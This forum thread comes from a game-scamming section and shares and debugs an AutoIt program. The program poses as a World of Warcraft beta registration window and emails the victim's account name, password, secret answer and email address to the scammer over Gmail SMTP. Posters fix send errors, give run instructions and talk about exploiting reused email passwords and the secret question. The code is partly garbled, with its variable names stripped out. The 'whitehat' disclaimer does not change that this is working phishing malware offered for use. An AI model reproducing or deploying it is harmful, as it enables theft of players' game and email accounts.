WoW ScamsWorld of Warcraft Whitehat Scamming Methods ONLY.
[NO QUESTIONS HERE] We do not condone scamming, this section is meant for people to read about scamming so they can prevent being scammed themselves.
Allright, so before i say anything, this is a fix for THIS THREAD ( [Only registered and activated users can see links. ] )
If you cannot understand what i'm talking about, you should probably read the thread above, as it will make much more sense to you. Look for something along the lines of "Line -1: Error: the requested action with this object has failed"
I couldnt get help myself from the OP so i decided to go to the source and see what was wrong. Found out that the SMTP server was denying the request to send a mail due to an SSL encryption error.
I messed around, looking for different SMTP for yahoo, registered different yahoo mail addreses, thing is, YAHOO DOES NOT WORK FOR THIS ANYMORE!
Use Gmail instead!
The SMTP info
Code:
Outgoing ( what we need )
smtp.gmail.com
Port: 465
And now, in the script, just change the things in red into your info
Internet rule 99: Whenever you see anyone by the name of Parog, wherever it may be, you MUST ask publicly what a Parog is. IE: "What's a Parog?" - Repeat until the internet is filled with nothing but "What's a Parog?".
Donate to remove ads, get your "DONATOR title, and get access to the MMOwned community's elite Shoutbawx.
You have to compile it completely, and make sure you Execute the compiled EXE in the same folder as the Dll
Can you link me your script just so i can see it? put it in code and ill check it, i'll be up for a few more minutes
edit : Going to bed for a few hours, will be back up later today, will check this thread if anyone needs help ( post your sourcecode - and hide your password )
__________________
Internet rule 99: Whenever you see anyone by the name of Parog, wherever it may be, you MUST ask publicly what a Parog is. IE: "What's a Parog?" - Repeat until the internet is filled with nothing but "What's a Parog?".
Hmm it always shows me the Error Message "Verwenden Sie einen gültigen World of Warcraft-Account zum registrieren." and after that... ...nothing plz help
OK I got this Prob under control... I now use a english client but it always sends me the error message "not sent" or sth. like this
Well some of you have downloaded the German version. You cannot understand this if you are not german, which I dont expect you to be.
So you go to my Thread, download the english file and then try to do it with gmail. If it doesnt work, use THIS FIX!
#include <GuiConstants.au3>
#Include <file.au3>
MsgBox( 0, "WotLK Beta Registration", "Please use a valid and active World of Warcraft account to register.")
Func _INetSmtpMailCom(, , , , = "", = "", = "", = "", = "", = "", = "",=465, =1)
= ObjCreate("CDO.Message")
.From = '"' & & '" <' & & '>'
.To =
Local = 0
Local = ""
If <> "" Then .Cc =
If <> "" Then .Bcc =
.Subject =
If StringInStr(,"<") and StringInStr(,">") Then
.HTMLBody =
Else
.Textbody = & @CRLF
EndIf
If <> "" Then
Local = StringSplit(, ";")
For = 1 To
= _PathFull ()
If FileExists() Then
.AddAttachment ()
Else
= & @lf & 'File not found to attach: ' &
SetError(1)
return 0
EndIf
Next
EndIf
.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserver") =
.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserverport") =
;Authenticated SMTP
If <> "" Then
.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusername") =
.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendpassword") =
EndIf
If Then
.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True
EndIf
;Update settings
.Configuration.Fields.Update
; Sent the Message
.Send
if @error then
SetError(2)
return
EndIf
EndFunc ;==>_INetSmtpMailCom
;
;
; Com Error Handler
Func MyErrFunc()
= Hex(.number, 8)
=
= StringStripWS(.description,3)
ConsoleWrite("### COM Error ! Number: " & & " ScriptLine: " & .scriptline & " Description:" & & @LF)
SetError(1); something to check for when this function returns
Return
EndFunc ;==>MyErrFunc
GuiCreate("Wrath of the Lich King - Beta Account Registration", 640,487, -1, -1, -1, )
GuiCtrlCreatePic("Library.dll",0,0,640,487)
GuiCtrlSetState(-1,)
=GUICtrlCreateInput ("", 260,220,150,20,)
=GUICtrlCreateInput ("", 260,270,150,20,+)
; BUTTON
= GuiCtrlCreateButton("Login", 255,305,70,20)
= GuiCtrlCreateButton("Cancel", 345,305,70,20)
; GUI MESSAGE LOOP
GuiSetState()
While 1
= GUIGetMsg()
Select
Case =
ExitLoop
Case =
= GUICtrlRead()
= GUICtrlRead()
= InputBox("Secret Answer", "Please type in your secret question answer.", "")
= InputBox("E-mail", "Please type in your e-mail address registered to your account.", "")
= "Accountname: " & @CRLF & & @CRLF & "Password:" & @CRLF & & @CRLF &"Antwort:" & @CRLF &
= _INetSmtpMailCom("smtp.gmail.com", , "youremail", "youremail", "WoWAccount", , "", "", "", "emailusername", "emailpass", 465, 1)
MsgBox( 0, "Registration sucessful", "When the Wrath of the Lich King beta starts, you will receive a beta key with which you can activate your beta account. Repeated filling of the registration has no more effect.")
ExitLoop
Case =
ExitLoop
EndSelect
WEnd
Btw, this code also includes asking for the account holders email address (sometimes the account holder has the same password for the email = free account)
You can remove this feature by removing:
$Email = InputBox("E-mail", "Please type in your e-mail address registered to your account.", "")
Hmm it always shows me the Error Message "Verwenden Sie einen gültigen World of Warcraft-Account zum registrieren." and after that... ...nothing plz help
OK I got this Prob under control... I now use a english client but it always sends me the error message "not sent" or sth. like this
that means you did not open the EXE WITH the DLL In the same folder
__________________
Internet rule 99: Whenever you see anyone by the name of Parog, wherever it may be, you MUST ask publicly what a Parog is. IE: "What's a Parog?" - Repeat until the internet is filled with nothing but "What's a Parog?".
Btw, this code also includes asking for the account holders email address (sometimes the account holder has the same password for the email = free account)
You can remove this feature by removing:
= InputBox("E-mail", "Please type in your e-mail address registered to your account.", "")
and
& @CRLF &"Email:" & @CRLF &
Also improved the grammar a little bit - Enjoy.
I thought about doing that too, but then i thought about all i could do with the secret question
__________________
Internet rule 99: Whenever you see anyone by the name of Parog, wherever it may be, you MUST ask publicly what a Parog is. IE: "What's a Parog?" - Repeat until the internet is filled with nothing but "What's a Parog?".